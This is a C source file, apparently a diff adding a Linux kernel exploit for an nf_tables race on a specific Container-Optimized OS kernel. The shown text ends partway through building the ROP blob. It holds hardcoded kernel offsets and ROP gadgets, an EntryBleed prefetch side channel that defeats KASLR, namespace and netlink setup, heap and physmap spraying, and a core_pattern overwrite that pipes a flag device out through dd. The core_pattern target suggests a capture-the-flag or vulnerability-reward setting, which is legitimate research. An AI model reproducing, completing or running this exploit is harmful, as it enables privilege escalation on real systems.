+ */ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/* ---------- protocol constants ---------- */ +#ifndef NFPROTO_UNSPEC +#define NFPROTO_UNSPEC 0 +#endif +#ifndef NFPROTO_INET +#define NFPROTO_INET 1 +#endif +#ifndef NFPROTO_IPV4 +#define NFPROTO_IPV4 2 +#endif +#ifndef NFPROTO_IPV6 +#define NFPROTO_IPV6 10 +#endif +#ifndef NF_INET_LOCAL_OUT +#define NF_INET_LOCAL_OUT 3 +#endif + +/* ---------- cos-113-18244.521.88 vmlinux offsets ---------- */ +#define OFF_MODPROBE 0x2a76a20ULL +#define OFF_CORE_PATTERN 0x2bb9ec0ULL +#define OFF_PAGE_OFFSET 0x21ac9a0ULL +#define OFF_NFT_IMM_OPS 0x1d433e0ULL +#define OFF_ENTRY_SYSCALL_64 0x1400080ULL +#define OFF_INIT_BEGIN 0x345c000ULL +#define OFF_INIT_END 0x36de000ULL +/* 0xffffffff81afc2d1: pop rsi ; pop rdi ; jmp __x86_return_thunk */ +#define OFF_POP_RSI_POP_RDI_JMP_RETURN_THUNK 0xafc2d1ULL +/* 0xffffffff81195d8c: pop rdi ; jmp __x86_return_thunk */ +#define OFF_POP_RDI_JMP_RETURN_THUNK 0x195d8cULL +#define OFF_STRCPY 0x12b59f0ULL +#define OFF_MSLEEP 0x243850ULL +#define OFF_RETURN_THUNK 0x16054b0ULL + +#define DROP_UID 1000 +#define DROP_GID 1000 + +/* MFD_EXEC was added in kernel 6.3; may be backported to 6.1 stable */ +#ifndef MFD_EXEC +#define MFD_EXEC 0x0010U +#endif + +/* + * nft_do_chain stack frame (6.1.155): + * sub $0x220, %rsp; 6 pushes = 48 bytes + * regs at rsp+0x48 + * canary at rsp+0x218 + * return address at rsp+0x250 + * dreg for ret addr = (0x250 - 0x48) / 4 = 130 + */ +#define DREG_RET 130 +#define DREG_RET4 134 +#define DREG_RET8 138 +#define DREG_RET12 142 + +/* + * nft_base_chain layout (cos-113, verified from vmlinux disasm): + * offsetof(nft_base_chain, chain) = 0x50 = 80 + * sizeof(nft_base_chain) ~= 216 -> kmalloc-256 + * + * Within 
the 256-byte allocation: + * +80: chain.blob_gen_0 (ptr) + * +88: chain.blob_gen_1 (ptr) + * +164: chain.flags byte (need bit 0 set = NFT_CHAIN_BASE) + * +64: basechain.policy (u8, need NF_ACCEPT = 1) + * + * msg_msg header is 48 bytes, so mtext offsets: + * mtext[16] = policy (alloc offset 64) + * mtext[32] = blob_gen_0 (alloc offset 80) + * mtext[40] = blob_gen_1 (alloc offset 88) + * mtext[116] = flags (alloc offset 164) + */ +#define BASECHAIN_CHAIN_OFF 80 +#define ALLOC_BLOB_GEN0 80 +#define ALLOC_BLOB_GEN1 88 +#define ALLOC_POLICY 64 +#define ALLOC_FLAGS 164 +#define MSG_HDR_SZ 48 +#define MTEXT_SZ 208 /* 256 - 48 */ + +/* ---------- tuning ---------- */ +#define IPV6_SATURATE_MAX 1100 +#define NUM_SPRAY_QS 256 +#define MSGS_PER_Q 4 +#define RACE_DURATION_SEC 30 +#define PHYSMAP_MB 2560 +#define INIT_ALIAS_CANDS 26 +#define INIT_ALIAS_SEC 20 +#define INIT_TIMING_PROBES 8 +#define WORKER_GRACE_SEC 6 +#define FLOOD_YIELD_INTERVAL 8 +#define PATH_OFFSET 0x100 +#define MAX_KBASE_CANDS 40 +#define MAX_PHBASE_CANDS 20 +#define KVA_CYCLE_ROUNDS 20 +#define RACE_BATCH_COUNT 1 /* 1 chain per batch */ +#define PAD_HOOKS 0 /* no padding hooks -- they delay packets past accept_all */ +#define USERBLOB_ADDR 0x13370000ULL +#define VULN_TRIGGER_SECONDS 170 +#define VULN_TRIGGER_LOG_EVERY 10 +#define VULN_TRIGGER_FLOODS 4 + +/* ---------- globals ---------- */ +static uint64_t kbase = 0; +static uint64_t phbase = 0; +static int physmap_mb = PHYSMAP_MB; +static uint64_t g_page_kva = 0; +static void *phys_region = NULL; +static volatile int race_running = 0; +static volatile int race_won = 0; +static int use_userblob = 0; /* 1 = SMAP off, use userspace blob */ + +/* namespace-safe payload delivery via memfd */ +static char g_modprobe_path[64] = "/tmp/pw"; +static int g_pw_fd = -1; +static int g_result_fd = -1; + +/* core_pattern approach: overwrite core_pattern instead of modprobe_path. + * |/bin/dd reads /dev/vdb (flag) and writes to /dev/ttyS0 (serial console). 
+ * This works even if /proc is not mounted in the init namespace. + * Trigger: kill a child with SIGSEGV -> core dump -> pipe to dd. */ +static const char g_core_cmd[] = "|/bin/dd if=/dev/vdb of=/dev/ttyS0"; +static int use_core_pattern = 1; /* default: use core_pattern approach */ + +#ifndef SYS_memfd_create +#define SYS_memfd_create 319 +#endif + +/* ---------- helpers ---------- */ +static void die(const char *m) { perror(m); _exit(1); } +static void sleep_ms(int ms) { + struct timespec ts = { ms / 1000, (ms % 1000) * 1000000L }; + nanosleep(&ts, NULL); +} +static uint64_t env_u64(const char *name) { + const char *v = getenv(name); + return v ? strtoull(v, NULL, 0) : 0; +} +static bool parse_u64_arg(const char *s, uint64_t *out) { + if (!s || !*s || !out) return false; + + errno = 0; + char *end = NULL; + unsigned long long v = strtoull(s, &end, 0); + if (errno == 0 && end != s && *end == '\0') { + *out = (uint64_t)v; + return true; + } + + errno = 0; + end = NULL; + v = strtoull(s, &end, 16); + if (errno == 0 && end != s && *end == '\0') { + *out = (uint64_t)v; + return true; + } + return false; +} +static bool kernel_cmdline_has_token(const char *token) { + if (!token || !*token) return false; + + char buf[4096] = {0}; + int fd = open("/proc/cmdline", O_RDONLY | O_CLOEXEC); + if (fd < 0) return false; + ssize_t n = read(fd, buf, sizeof(buf) - 1); + close(fd); + if (n <= 0) return false; + buf[n] = '\0'; + + size_t token_len = strlen(token); + for (char *p = buf; *p;) { + while (*p == ' ' || *p == '\n' || *p == '\t') p++; + if (!*p) break; + char *q = p; + while (*q && *q != ' ' && *q != '\n' && *q != '\t') q++; + if ((size_t)(q - p) == token_len && + memcmp(p, token, token_len) == 0) + return true; + p = q; + } + return false; +} +static void cpu_pin(int cpu) { + cpu_set_t s; + CPU_ZERO(&s); + CPU_SET(cpu, &s); + sched_setaffinity(0, sizeof(s), &s); +} + +/* + * Check if SMAP is enabled by examining /proc/cpuinfo flags. 
+ * Returns 1 if SMAP is present (kernel can't read userspace), + * 0 if absent (userspace blob approach works). + */ +static int check_smap(void) { + FILE *f = fopen("/proc/cpuinfo", "r"); + if (!f) return 1; /* assume present */ + char line[4096]; + while (fgets(line, sizeof(line), f)) { + if (strncmp(line, "flags", 5) == 0) { + fclose(f); + if (strstr(line, " smap")) + return 1; + return 0; + } + } + fclose(f); + return 1; /* no flags line -> assume present */ +} + +/* ================================================================ + * KASLR bypass: prefetch side channel + * ================================================================ */ +#define PREFETCH_SCAN_TRIES (64 * 1024) +#define PREFETCH_CONFIRM_TRIES (128 * 1024) +#define PREFETCH_HIST_SIZE 4000 +#define PREFETCH_THRESHOLD_DEFAULT 190 +#define PREFETCH_THRESHOLD_XEON 130 +#define PREFETCH_THRESHOLD_MARGIN 24 +#define KTEXT_SCAN_START 0xffffffff81000000ULL +#define KTEXT_SCAN_END 0xffffffffc1000000ULL +#define KTEXT_SCAN_STEP 0x200000ULL +#define KTEXT_INTEL_STEP 0x1000000ULL +#define DIRECT_MAP_START 0xffff888000000000ULL +#define DIRECT_MAP_END 0xffffc88000000000ULL +#define DIRECT_MAP_COARSE_STEP 0x80000000ULL +#define DIRECT_MAP_CAND_STEP 0x10000000ULL +#define DIRECT_MAP_REFINE_STEP 0x10000000ULL +#define INTEL_PREFETCH_SAMPLES 16 +#define INTEL_PREFETCH_VOTES 7 +#define INTEL_DIRECT_COARSE_STEP 0x40000000ULL +#define INTEL_DIRECT_REFINE_STEP 0x4000000ULL + +static size_t prefetch_hist[PREFETCH_HIST_SIZE]; +static int prefetch_threshold; +static int prefetch_cpu_vendor = -1; + +static inline __attribute__((always_inline)) uint64_t rdtsc_begin(void) +{ + uint64_t a, d; + asm volatile("mfence\n\t" + "rdtscp\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "mfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + return (d << 32) | a; +} + +static inline __attribute__((always_inline)) uint64_t rdtsc_end(void) +{ + uint64_t a, d; + asm volatile("xor 
%%rax, %%rax\n\t" + "mfence\n\t" + "rdtscp\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + return (d << 32) | a; +} + +static inline void prefetch_probe(const void *p) +{ + asm volatile("prefetchnta (%0)" : : "r"(p)); + asm volatile("prefetcht2 (%0)" : : "r"(p)); +} + +static size_t prefetch_once(uint64_t addr) +{ + size_t t = rdtsc_begin(); + prefetch_probe((const void *)addr); + return rdtsc_end() - t; +} + +static size_t prefetch_measure_tries(uint64_t addr, int tries) +{ + memset(prefetch_hist, 0, sizeof(prefetch_hist)); + for (int i = 0; i < tries; i++) { + size_t d = prefetch_once(addr); + if (d >= PREFETCH_HIST_SIZE) + d = PREFETCH_HIST_SIZE - 1; + prefetch_hist[d]++; + } + + size_t sum = 0; + for (int i = 0; i < PREFETCH_HIST_SIZE; i++) + sum += prefetch_hist[i] * i; + return sum / tries; +} + +static size_t prefetch_measure(uint64_t addr) +{ + return prefetch_measure_tries(addr, PREFETCH_CONFIRM_TRIES); +} + +static int prefetch_cpu_is_intel(void) +{ + if (prefetch_cpu_vendor >= 0) + return prefetch_cpu_vendor == 1; + + prefetch_cpu_vendor = 0; + FILE *f = fopen("/proc/cpuinfo", "r"); + if (!f) + return 0; + + char line[512]; + while (fgets(line, sizeof(line), f)) { + if (strstr(line, "GenuineIntel") || strstr(line, "Intel(R)")) { + prefetch_cpu_vendor = 1; + break; + } + } + fclose(f); + return prefetch_cpu_vendor == 1; +} + +static void detect_prefetch_threshold(void) +{ + char buf[512] = {0}; + int fd = open("/proc/cpuinfo", O_RDONLY | O_CLOEXEC); + + prefetch_threshold = PREFETCH_THRESHOLD_DEFAULT; + if (fd >= 0) { + ssize_t n = read(fd, buf, sizeof(buf) - 1); + close(fd); + if (n > 0 && strstr(buf, "Xeon")) + prefetch_threshold = PREFETCH_THRESHOLD_XEON; + } +} + +static void pin_prefetch_cpu(cpu_set_t *oldset, int *have_old) +{ + cpu_set_t set; + + *have_old = sched_getaffinity(0, sizeof(*oldset), oldset) == 0; + CPU_ZERO(&set); + CPU_SET(0, &set); + if 
(sched_setaffinity(0, sizeof(set), &set) < 0) + perror("sched_setaffinity(prefetch)"); +} + +static void restore_prefetch_cpu(cpu_set_t *oldset, int have_old) +{ + if (have_old && sched_setaffinity(0, sizeof(*oldset), oldset) < 0) + perror("sched_setaffinity(restore)"); +} + +static size_t prefetch_measure_min(uint64_t addr, int samples, + int prime_syscall) +{ + size_t best = (size_t)-1; + + for (int i = 0; i < samples; i++) { + if (prime_syscall) + (void)syscall(SYS_getuid); + size_t t = prefetch_once(addr); + if (t < best) + best = t; + } + return best; +} + +static uint64_t prefetch_scan_lowest_vote(const char *name, uint64_t start, + uint64_t end, uint64_t step, + uint64_t probe_add, + int prime_syscall) +{ + cpu_set_t oldset; + int have_old = 0; + uint64_t votes[INTEL_PREFETCH_VOTES] = {0}; + + pin_prefetch_cpu(&oldset, &have_old); + printf("[*] prefetch %s: intel-min step=%#lx probe_add=%#lx\n", + name, (unsigned long)step, (unsigned long)probe_add); + + for (int vote = 0; vote < INTEL_PREFETCH_VOTES; vote++) { + uint64_t best_addr = 0; + size_t best = (size_t)-1; + size_t second = (size_t)-1; + unsigned long best_idx = 0; + unsigned long idx = 0; + + for (uint64_t addr = start; addr < end; addr += step, idx++) { + size_t t = prefetch_measure_min(addr + probe_add, + INTEL_PREFETCH_SAMPLES, + prime_syscall); + if (t < best) { + second = best; + best = t; + best_addr = addr; + best_idx = idx; + } else if (t < second) { + second = t; + } + } + + if (second != (size_t)-1 && best == second) { + printf("[*] prefetch %s: intel vote %d flat best=%#lx t=%zu\n", + name, vote, (unsigned long)best_addr, best); + votes[vote] = 0; + continue; + } + + votes[vote] = best_addr; + printf("[*] prefetch %s: intel vote %d best=%#lx i=%lu t=%zu second=%zu\n", + name, vote, (unsigned long)best_addr, best_idx, + best, second); + } + + restore_prefetch_cpu(&oldset, have_old); + + uint64_t candidate = 0; + int balance = 0; + for (int i = 0; i < INTEL_PREFETCH_VOTES; i++) { + if 
(!votes[i]) + continue; + if (balance == 0) { + candidate = votes[i]; + balance = 1; + } else if (candidate == votes[i]) { + balance++; + } else { + balance--; + } + } + + int count = 0; + for (int i = 0; i < INTEL_PREFETCH_VOTES; i++) + if (votes[i] == candidate) + count++; + + if (candidate && count > INTEL_PREFETCH_VOTES / 2) { + printf("[+] prefetch %s: intel found=%#lx votes=%d/%d\n", + name, (unsigned long)candidate, count, + INTEL_PREFETCH_VOTES); + return candidate; + } + + printf("[!] prefetch %s: intel majority failed candidate=%#lx votes=%d/%d\n", + name, (unsigned long)candidate, count, INTEL_PREFETCH_VOTES); + return 0; +} + +static uint64_t prefetch_scan_first_hit(const char *name, uint64_t start, + uint64_t end, uint64_t step) +{ + cpu_set_t oldset; + int have_old = 0; + unsigned long idx = 0; + uint64_t found = 0; + + if (!prefetch_threshold) + detect_prefetch_threshold(); + + pin_prefetch_cpu(&oldset, &have_old); + (void)prefetch_measure_tries(0xffffffff00000000ULL, + PREFETCH_SCAN_TRIES); + size_t bad = prefetch_measure_tries(0xffffffff00000000ULL, + PREFETCH_SCAN_TRIES); + size_t threshold = prefetch_threshold; + if (bad + PREFETCH_THRESHOLD_MARGIN < threshold) + threshold = bad + PREFETCH_THRESHOLD_MARGIN; + printf("[*] prefetch %s: bad=%zu threshold=%zu step=%#lx\n", + name, bad, threshold, (unsigned long)step); + + for (uint64_t addr = start; addr < end; addr += step, idx++) { + size_t t = prefetch_measure_tries(addr, PREFETCH_SCAN_TRIES); + if ((idx & 0x3ff) == 0) + printf("[*] prefetch %s: addr=%#lx i=%lu t=%zu\n", + name, (unsigned long)addr, idx, t); + if (t > threshold) { + size_t confirm = prefetch_measure(addr); + if (confirm > threshold) { + found = addr; + printf("[+] prefetch %s: found=%#lx i=%lu t=%zu/%zu\n", + name, (unsigned long)addr, idx, t, confirm); + break; + } + printf("[*] prefetch %s: transient=%#lx t=%zu/%zu\n", + name, (unsigned long)addr, t, confirm); + } + } + + restore_prefetch_cpu(&oldset, have_old); + if (!found) + 
printf("[!] prefetch %s: no hit\n", name); + return found; +} + +static void add_u64_candidate(uint64_t *arr, int *n, int max, uint64_t val) +{ + if (!val) + return; + for (int i = 0; i < *n; i++) + if (arr[i] == val) + return; + if (*n < max) + arr[(*n)++] = val; +} + +static uint64_t leak_kernel_text_prefetch(void) +{ + if (prefetch_cpu_is_intel()) { + return prefetch_scan_lowest_vote("kernel-entry", + KTEXT_SCAN_START, + KTEXT_SCAN_END, + KTEXT_INTEL_STEP, + OFF_ENTRY_SYSCALL_64, 1); + } + return prefetch_scan_first_hit("kernel-text", KTEXT_SCAN_START, + KTEXT_SCAN_END, KTEXT_SCAN_STEP); +} + +static uint64_t leak_direct_mapping_prefetch(void) +{ + uint64_t coarse, ref_start, ref_end, refined; + + if (prefetch_cpu_is_intel()) { + coarse = prefetch_scan_lowest_vote("direct-map", + DIRECT_MAP_START, + DIRECT_MAP_END, + INTEL_DIRECT_COARSE_STEP, + 0, 0); + if (!coarse) + return 0; + + ref_start = coarse > 2 * INTEL_DIRECT_COARSE_STEP ? + coarse - 2 * INTEL_DIRECT_COARSE_STEP : + DIRECT_MAP_START; + if (ref_start < DIRECT_MAP_START) + ref_start = DIRECT_MAP_START; + ref_end = coarse + INTEL_DIRECT_COARSE_STEP; + if (ref_end > DIRECT_MAP_END || ref_end < coarse) + ref_end = DIRECT_MAP_END; + + refined = prefetch_scan_lowest_vote("direct-map-refine", + ref_start, ref_end, + INTEL_DIRECT_REFINE_STEP, + 0, 0); + return refined ? refined : coarse; + } + + coarse = prefetch_scan_first_hit("direct-map", DIRECT_MAP_START, + DIRECT_MAP_END, DIRECT_MAP_COARSE_STEP); + if (!coarse) + return 0; + + ref_start = coarse > 3 * DIRECT_MAP_COARSE_STEP ? + coarse - 3 * DIRECT_MAP_COARSE_STEP : DIRECT_MAP_START; + if (ref_start < DIRECT_MAP_START) + ref_start = DIRECT_MAP_START; + ref_end = coarse + DIRECT_MAP_COARSE_STEP; + if (ref_end > DIRECT_MAP_END || ref_end < coarse) + ref_end = DIRECT_MAP_END; + + refined = prefetch_scan_first_hit("direct-map-refine", ref_start, + ref_end, DIRECT_MAP_REFINE_STEP); + return refined ? 
refined : coarse; +} +static uint64_t kbase_cands[MAX_KBASE_CANDS]; +static int n_kbase_cands = 0; +static uint64_t phbase_cands[MAX_PHBASE_CANDS]; +static int n_phbase_cands = 0; + +static int do_entrybleed(void) { + printf("[*] Entrybleed: scanning kbase with prefetch side channel...\n"); + kbase = leak_kernel_text_prefetch(); + + /* Sanity: kbase must be in the valid range */ + if (kbase < 0xffffffff81000000ULL || + kbase >= 0xffffffffc1000000ULL) { + printf("[-] Entrybleed: kbase %#lx out of range\n", + (unsigned long)kbase); + kbase = 0; + return 0; + } + + n_kbase_cands = 0; + add_u64_candidate(kbase_cands, &n_kbase_cands, MAX_KBASE_CANDS, kbase); + for (int d = -16; d <= 16 && n_kbase_cands < MAX_KBASE_CANDS; d++) { + if (d == 0) continue; + uint64_t c = kbase + d * KTEXT_SCAN_STEP; + if (c < 0xffffffff81000000ULL || + c >= 0xffffffffc1000000ULL) continue; + add_u64_candidate(kbase_cands, &n_kbase_cands, + MAX_KBASE_CANDS, c); + } + printf("[+] kbase=%#lx (%d candidates)\n", + (unsigned long)kbase, n_kbase_cands); + + /* Skip phbase scan if using userblob (no SMAP -> don't need physmap) */ + if (use_userblob) { + phbase = 0xffff888000000000ULL; /* dummy, unused */ + printf("[*] Entrybleed: skipping physmap scan (userblob mode)\n"); + return 1; + } + + printf("[*] Entrybleed: scanning direct-map base with prefetch side channel...\n"); + phbase = leak_direct_mapping_prefetch(); + + /* Sanity: phbase must be in valid range */ + if (phbase < DIRECT_MAP_START || phbase >= DIRECT_MAP_END) { + printf("[-] Entrybleed: phbase %#lx out of range\n", + (unsigned long)phbase); + phbase = 0; + return 0; + } + + n_phbase_cands = 0; + add_u64_candidate(phbase_cands, &n_phbase_cands, + MAX_PHBASE_CANDS, phbase); + int spiral[] = {-1, 1, -2, 2, -3, 3, -4, 4, -5, 5, -6, 6}; + for (size_t s = 0; s < sizeof(spiral) / sizeof(spiral[0]) && + n_phbase_cands < MAX_PHBASE_CANDS; s++) { + uint64_t c = phbase + spiral[s] * DIRECT_MAP_CAND_STEP; + if (c < DIRECT_MAP_START || c >= 
DIRECT_MAP_END) continue; + add_u64_candidate(phbase_cands, &n_phbase_cands, + MAX_PHBASE_CANDS, c); + } + printf("[+] phbase=%#lx (%d candidates)\n", + (unsigned long)phbase, n_phbase_cands); + return 1; +} + +/* ================================================================ + * Namespace setup + * ================================================================ */ +static void xwrite(const char *path, const char *s) { + int fd = open(path, O_WRONLY | O_CLOEXEC); + if (fd < 0) die(path); + if (write(fd, s, strlen(s)) < 0) { /* ignore */ } + close(fd); +} +static void setup_ns(void) { + uid_t u = getuid(); gid_t g = getgid(); + if (u == 0) { + if (setresgid(DROP_GID,DROP_GID,DROP_GID) < 0) + die("setresgid(drop)"); + if (setresuid(DROP_UID,DROP_UID,DROP_UID) < 0) + die("setresuid(drop)"); + prctl(PR_SET_DUMPABLE, 1, 0, 0, 0); + u = getuid(); g = getgid(); + } + if (unshare(CLONE_NEWUSER) < 0) die("unshare(NEWUSER)"); + xwrite("/proc/self/setgroups", "deny\n"); + char m[64]; + snprintf(m, sizeof(m), "0 %u 1\n", u); + xwrite("/proc/self/uid_map", m); + snprintf(m, sizeof(m), "0 %u 1\n", g); + xwrite("/proc/self/gid_map", m); + if (setresgid(0,0,0) < 0) die("setresgid(root)"); + if (setresuid(0,0,0) < 0) die("setresuid(root)"); + if (unshare(CLONE_NEWNET) < 0) die("unshare(NEWNET)"); + int fd = socket(AF_INET, SOCK_DGRAM|SOCK_CLOEXEC, 0); + if (fd >= 0) { + struct ifreq ifr = {0}; + strncpy(ifr.ifr_name, "lo", IFNAMSIZ-1); + ioctl(fd, SIOCGIFFLAGS, &ifr); + ifr.ifr_flags |= IFF_UP | IFF_RUNNING; + ioctl(fd, SIOCSIFFLAGS, &ifr); + close(fd); + } +} + +/* ================================================================ + * Netlink helpers (simple single-op for this exploit) + * ================================================================ */ +static int nl_sock = -1; +static uint32_t nl_seq; + +static void *nlmsg_tail(struct nlmsghdr *h) { + return (char *)h + NLMSG_ALIGN(h->nlmsg_len); +} +static int nla_put(struct nlmsghdr *h, size_t mx, uint16_t t, + const void 
*d, size_t l) { + size_t nw = NLMSG_ALIGN(h->nlmsg_len) + NLA_ALIGN(NLA_HDRLEN + l); + if (nw > mx) return -1; + struct nlattr *a = nlmsg_tail(h); + a->nla_type = t; a->nla_len = NLA_HDRLEN + l; + if (l) memcpy((char*)a + NLA_HDRLEN, d, l); + h->nlmsg_len = nw; + return 0; +} +static int nlastr(struct nlmsghdr *h, size_t mx, uint16_t t, const char *s) { + return nla_put(h, mx, t, s, strlen(s)+1); +} +static int nla32(struct nlmsghdr *h, size_t mx, uint16_t t, uint32_t v) { + v = htonl(v); + return nla_put(h, mx, t, &v, 4); +} +static struct nlattr *nla_nest_s(struct nlmsghdr *h, size_t mx, uint16_t t) { + size_t nw = NLMSG_ALIGN(h->nlmsg_len) + NLA_ALIGN(NLA_HDRLEN); + if (nw > mx) return NULL; + struct nlattr *a = nlmsg_tail(h); + a->nla_type = t | NLA_F_NESTED; + a->nla_len = NLA_HDRLEN; + h->nlmsg_len = nw; + return a; +} +static void nla_nest_e(struct nlmsghdr *h, struct nlattr *a) { + a->nla_len = (char *)nlmsg_tail(h) - (char *)a; +} + +static int nl_open(void) { + nl_sock = socket(AF_NETLINK, SOCK_RAW|SOCK_CLOEXEC, NETLINK_NETFILTER); + if (nl_sock < 0) return -1; + struct sockaddr_nl sa = { .nl_family = AF_NETLINK, + .nl_pid = getpid() }; + if (bind(nl_sock, (struct sockaddr*)&sa, sizeof(sa)) < 0) return -1; + int bufsz = 1 << 20; + setsockopt(nl_sock, SOL_SOCKET, SO_SNDBUF, &bufsz, sizeof(bufsz)); + setsockopt(nl_sock, SOL_SOCKET, SO_RCVBUF, &bufsz, sizeof(bufsz)); + return 0; +} + +static size_t batch_hdr(char *buf, size_t mx, uint16_t type, uint16_t res) { + (void)mx; + struct nlmsghdr *h = (void *)buf; + memset(h, 0, sizeof(*h)); + h->nlmsg_type = type; + h->nlmsg_flags = NLM_F_REQUEST; + h->nlmsg_seq = ++nl_seq; + h->nlmsg_pid = getpid(); + h->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg)); + struct nfgenmsg *g = NLMSG_DATA(h); + g->nfgen_family = 0; g->version = NFNETLINK_V0; + g->res_id = htons(res); + return NLMSG_ALIGN(h->nlmsg_len); +} + +static int recv_ack(uint32_t seq) { + char buf[8192]; struct timeval tv = {5, 0}; + setsockopt(nl_sock, 
SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv)); + for (;;) { + ssize_t n = recv(nl_sock, buf, sizeof(buf), 0); + if (n <= 0) return -errno; + for (struct nlmsghdr *h = (void*)buf; + NLMSG_OK(h, (unsigned)n); h = NLMSG_NEXT(h, n)) { + if (h->nlmsg_type != NLMSG_ERROR) continue; + struct nlmsgerr *e = NLMSG_DATA(h); + if (h->nlmsg_seq == seq) return e->error; + } + } +} + +#define NFT_T(msg) ((NFNL_SUBSYS_NFTABLES << 8) | (msg)) +#define NLC (NLM_F_CREATE | NLM_F_EXCL) + +static int nft_newtable(uint8_t fam, const char *name) { + char buf[4096]; size_t off = 0; + off += batch_hdr(buf+off, sizeof(buf)-off, + NFNL_MSG_BATCH_BEGIN, NFNL_SUBSYS_NFTABLES); + struct nlmsghdr *op = (void*)(buf+off); + memset(op, 0, sizeof(*op)); + op->nlmsg_type = NFT_T(NFT_MSG_NEWTABLE); + op->nlmsg_flags = NLM_F_REQUEST|NLM_F_ACK|NLC; + uint32_t s = ++nl_seq; op->nlmsg_seq = s; + op->nlmsg_pid = getpid(); + op->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg)); + struct nfgenmsg *g = NLMSG_DATA(op); + g->nfgen_family = fam; g->version = NFNETLINK_V0; + nlastr(op, sizeof(buf), NFTA_TABLE_NAME, name); + off += NLMSG_ALIGN(op->nlmsg_len); + off += batch_hdr(buf+off, sizeof(buf)-off, + NFNL_MSG_BATCH_END, NFNL_SUBSYS_NFTABLES); + struct sockaddr_nl sa = { .nl_family = AF_NETLINK }; + sendto(nl_sock, buf, off, 0, (struct sockaddr*)&sa, sizeof(sa)); + return recv_ack(s); +} + +static int nft_newchain(uint8_t fam, const char *tab, const char *chain, + uint32_t hooknum, int32_t prio) { + char buf[4096]; size_t off = 0; + off += batch_hdr(buf+off, sizeof(buf)-off, + NFNL_MSG_BATCH_BEGIN, NFNL_SUBSYS_NFTABLES); + struct nlmsghdr *op = (void*)(buf+off); + memset(op, 0, sizeof(*op)); + op->nlmsg_type = NFT_T(NFT_MSG_NEWCHAIN); + op->nlmsg_flags = NLM_F_REQUEST|NLM_F_ACK|NLC; + uint32_t s = ++nl_seq; op->nlmsg_seq = s; + op->nlmsg_pid = getpid(); + op->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg)); + struct nfgenmsg *g = NLMSG_DATA(op); + g->nfgen_family = fam; g->version = NFNETLINK_V0; + nlastr(op, 
sizeof(buf), NFTA_CHAIN_TABLE, tab); + nlastr(op, sizeof(buf), NFTA_CHAIN_NAME, chain); + struct nlattr *hk = nla_nest_s(op, sizeof(buf), NFTA_CHAIN_HOOK); + nla32(op, sizeof(buf), NFTA_HOOK_HOOKNUM, hooknum); + nla32(op, sizeof(buf), NFTA_HOOK_PRIORITY, (uint32_t)prio); + nla_nest_e(op, hk); + nla32(op, sizeof(buf), NFTA_CHAIN_POLICY, NF_ACCEPT); + off += NLMSG_ALIGN(op->nlmsg_len); + off += batch_hdr(buf+off, sizeof(buf)-off, + NFNL_MSG_BATCH_END, NFNL_SUBSYS_NFTABLES); + struct sockaddr_nl sa = { .nl_family = AF_NETLINK }; + sendto(nl_sock, buf, off, 0, (struct sockaddr*)&sa, sizeof(sa)); + return recv_ack(s); +} + +/* ================================================================ + * IPv6 hook saturation + * ================================================================ */ +static int saturate_ipv6_hooks(void) { + printf("[*] creating ipv6 table t6\n"); + int err = nft_newtable(NFPROTO_IPV6, "t6"); + if (err && err != -EEXIST) { + printf("[-] newtable ipv6: %d\n", err); + return -1; + } + printf("[*] saturating ipv6 LOCAL_OUT...\n"); + int i; + for (i = 0; i < IPV6_SATURATE_MAX; i++) { + char name[32]; + snprintf(name, sizeof(name), "c%d", i); + err = nft_newchain(NFPROTO_IPV6, "t6", name, + NF_INET_LOCAL_OUT, 0); + if (err == -E2BIG) { + printf("[+] ipv6 LOCAL_OUT saturated at %d chains\n",i); + break; + } + if (err) { + printf("[-] ipv6 chain %d: %d\n", i, err); + return -1; + } + if (i % 128 == 0) printf(" ... %d\n", i); + } + if (i >= IPV6_SATURATE_MAX) { + printf("[-] failed to saturate (reached max)\n"); + return -1; + } + /* Create INET table for the race */ + printf("[*] creating inet table ti\n"); + err = nft_newtable(NFPROTO_INET, "ti"); + if (err && err != -EEXIST) { + printf("[-] newtable inet: %d\n", err); + return -1; + } + + /* No padding hooks -- they delayed packets past WRITE_ONCE(accept_all), + * guaranteeing packets never called nft_do_chain_inet. 
*/ + + return 0; +} + +/* ================================================================ + * Physmap spray + ROP blob + * ================================================================ */ +static void physmap_spray(void) { + size_t sz = (size_t)physmap_mb << 20; + phys_region = mmap(NULL, sz, PROT_READ|PROT_WRITE, + MAP_SHARED|MAP_ANONYMOUS|MAP_POPULATE, -1, 0); + if (phys_region == MAP_FAILED) die("mmap physmap"); + printf("[+] physmap: %d MB at %p\n", physmap_mb, phys_region); +} + +static uint64_t read_physmap_kva(void) { + int fd = open("/proc/self/pagemap", O_RDONLY); + if (fd < 0) return 0; + uint64_t vaddr = (uint64_t)phys_region; + uint64_t entry = 0; + if (pread(fd, &entry, 8, (off_t)(vaddr/4096)*8) != 8) { + close(fd); return 0; + } + close(fd); + if (!(entry & (1ULL<<63))) return 0; + uint64_t pfn = entry & ((1ULL<<55)-1); + if (!pfn) return 0; + return phbase + pfn * 4096; +} + +/* + * Build a self-contained ROP blob for a page at the given KVA. + * The page_kva is used for src_va (the path string address within that page). + * This means each blob is independent: if the msg_msg blob_gen_X points to + * ANY physmap page, the src_va in that page's blob correctly references + * that same page's PATH_OFFSET. + */ +static void build_blob(uint8_t *blob, uint64_t page_kva) { + /* Target: overwrite core_pattern (avoids /proc mount dependency). + * Fallback: overwrite modprobe_path if use_core_pattern is off. */ + uint64_t target_va = use_core_pattern ? 
